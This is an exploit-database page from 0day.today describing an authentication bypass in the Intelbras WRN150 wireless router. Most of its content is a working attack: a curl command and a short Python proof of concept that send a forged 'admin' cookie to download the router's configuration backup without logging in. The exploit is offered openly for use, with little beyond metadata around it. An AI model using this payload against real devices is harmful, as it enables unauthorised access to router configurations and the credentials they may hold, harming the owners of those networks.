[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Roteador Wireless Intelbras WRN150 - Autentication Bypass Vulnerability

Author
Elber Tavares
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-28664
Category
web applications
Date add
28-09-2017
Platform
hardware
# Exploit Title: Autentication Bypass/Config file download - INTELBRAS WRN
150
# Date: 28/09/2017
# Exploit Author: Elber Tavares
# Vendor Homepage: http://intelbras.com.br/
# Version: Intelbras Wireless N 150 Mbps - WRN 150
# Tested on: kali linux, windows 7, 8.1, 10
For more info:
 
http://whiteboyz.xyz/authentication-bypass-intelbras-wrn-150.html
 
URL VULN: http://10.0.0.1/
 
Download backup file:
 
Payload: curl --cookie "Cookie=admin:language=pt"
http://10.0.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg
 
 
 
PoC:
 
#pip install requests
from requests import get
 
url = "http://10.0.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg"
#url do backup
header = {'Cookie': 'admin:language=pt'}
#setando o cookie no header
r = get(url, headers=header).text
print(r)

#  0day.today [2024-10-06]  #